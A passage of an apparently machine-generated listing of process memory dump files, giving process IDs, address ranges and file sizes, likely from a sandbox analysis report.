memory/5224-225-0x0000000000000000-mapping.dmp
-
memory/5240-371-0x0000000004DB0000-0x0000000004DB1000-memory.dmpFilesize
4KB
-
memory/5240-327-0x0000000000000000-mapping.dmp
-
memory/5296-235-0x0000000000000000-mapping.dmp
-
memory/5324-301-0x0000000000000000-mapping.dmp
-
memory/5512-245-0x0000000000000000-mapping.dmp
-
memory/5532-558-0x0000000004A30000-0x0000000004ADB000-memory.dmpFilesize
684KB
-
memory/5588-533-0x0000000000940000-0x0000000000950000-memory.dmpFilesize
64KB
-
memory/5588-539-0x0000000000960000-0x0000000000972000-memory.dmpFilesize
72KB
-
memory/5600-309-0x0000000000000000-mapping.dmp
-
memory/5648-445-0x0000000000000000-mapping.dmp
-
memory/5648-514-0x00000000052B0000-0x0000000005856000-memory.dmpFilesize
5.6MB
-
memory/5652-413-0x0000000000000000-mapping.dmp
-
memory/5700-430-0x0000000000000000-mapping.dmp
-
memory/5700-431-0x00000000015A0000-0x00000000015A2000-memory.dmpFilesize
8KB
-
memory/5704-378-0x0000000005650000-0x0000000005651000-memory.dmpFilesize
4KB
-
memory/5704-314-0x0000000000000000-mapping.dmp
-
memory/5744-561-0x00000150420E0000-0x00000150420E2000-memory.dmpFilesize
8KB
-
memory/5744-543-0x0000015027AF0000-0x0000015027B1D000-memory.dmpFilesize
180KB
-
memory/5744-321-0x0000000000000000-mapping.dmp
-
memory/5744-334-0x00000000002C0000-0x00000000002C1000-memory.dmpFilesize
4KB
-
memory/5744-568-0x00000150420E3000-0x00000150420E5000-memory.dmpFilesize
8KB
-
memory/5744-580-0x00000150420E6000-0x00000150420E7000-memory.dmpFilesize
4KB
-
memory/5744-366-0x0000000004B60000-0x0000000004B61000-memory.dmpFilesize
4KB
-
memory/5768-319-0x00000000051B0000-0x00000000057C8000-memory.dmpFilesize
6.1MB
-
memory/5768-293-0x0000000000400000-0x0000000000422000-memory.dmpFilesize
136KB
-
memory/5768-292-0x0000000000000000-mapping.dmp
-
memory/5776-302-0x00000000025F0000-0x00000000025F1000-memory.dmpFilesize
4KB
-
memory/5776-323-0x00000000079B0000-0x00000000079B1000-memory.dmpFilesize
4KB
-
memory/5776-311-0x0000000007DD0000-0x0000000007DD1000-memory.dmpFilesize
4KB
-
memory/5776-295-0x00000000025A0000-0x00000000025DE000-memory.dmpFilesize
248KB
-
memory/5776-308-0x0000000004F30000-0x0000000004F31000-memory.dmpFilesize
4KB
-
memory/5776-310-0x00000000076D0000-0x00000000076D1000-memory.dmpFilesize
4KB
-
memory/5776-289-0x0000000002740000-0x0000000002741000-memory.dmpFilesize
4KB
-
memory/5776-270-0x0000000000000000-mapping.dmp
-
memory/5776-285-0x00000000004D0000-0x00000000004D1000-memory.dmpFilesize
4KB
-
memory/5776-324-0x0000000007A50000-0x0000000007A51000-memory.dmpFilesize
4KB
-
memory/5792-272-0x0000000000000000-mapping.dmp
-
memory/5824-563-0x000002B961300000-0x000002B961302000-memory.dmpFilesize
8KB
-
memory/5824-572-0x000002B961303000-0x000002B961305000-memory.dmpFilesize
8KB
-
memory/5824-575-0x000002B961306000-0x000002B961307000-memory.dmpFilesize
4KB
-
memory/5824-536-0x000002B95F500000-0x000002B95F529000-memory.dmpFilesize
164KB
-
memory/5872-287-0x0000000004BB0000-0x0000000004BB1000-memory.dmpFilesize
4KB
-
memory/5872-282-0x0000000000460000-0x0000000000461000-memory.dmpFilesize
4KB
-
memory/5872-276-0x0000000000000000-mapping.dmp
-
memory/5884-479-0x000000001BA00000-0x000000001BA02000-memory.dmpFilesize
8KB
-
memory/5900-277-0x0000000000000000-mapping.dmp
-
memory/5972-453-0x0000000000000000-mapping.dmp
-
memory/5992-555-0x0000000004D20000-0x0000000004D21000-memory.dmpFilesize
4KB
-
memory/6012-400-0x0000000000000000-mapping.dmp
-
memory/6048-364-0x0000000000000000-mapping.dmp
-
memory/6072-288-0x0000000000000000-mapping.dmp
-
memory/6100-368-0x0000000005550000-0x0000000005551000-memory.dmpFilesize
4KB
-
memory/6100-291-0x0000000000000000-mapping.dmp
-
memory/6100-328-0x0000000000090000-0x0000000000091000-memory.dmpFilesize
4KB
-
memory/6912-779-0x0000027BAE820000-0x0000027BAE822000-memory.dmpFilesize
8KB
-
memory/6924-762-0x000001F6BEF90000-0x000001F6BEF92000-memory.dmpFilesize
8KB
-
memory/6924-774-0x000001F6BEF93000-0x000001F6BEF95000-memory.dmpFilesize
8KB
-
memory/7024-783-0x0000000006970000-0x0000000006971000-memory.dmpFilesize
4KB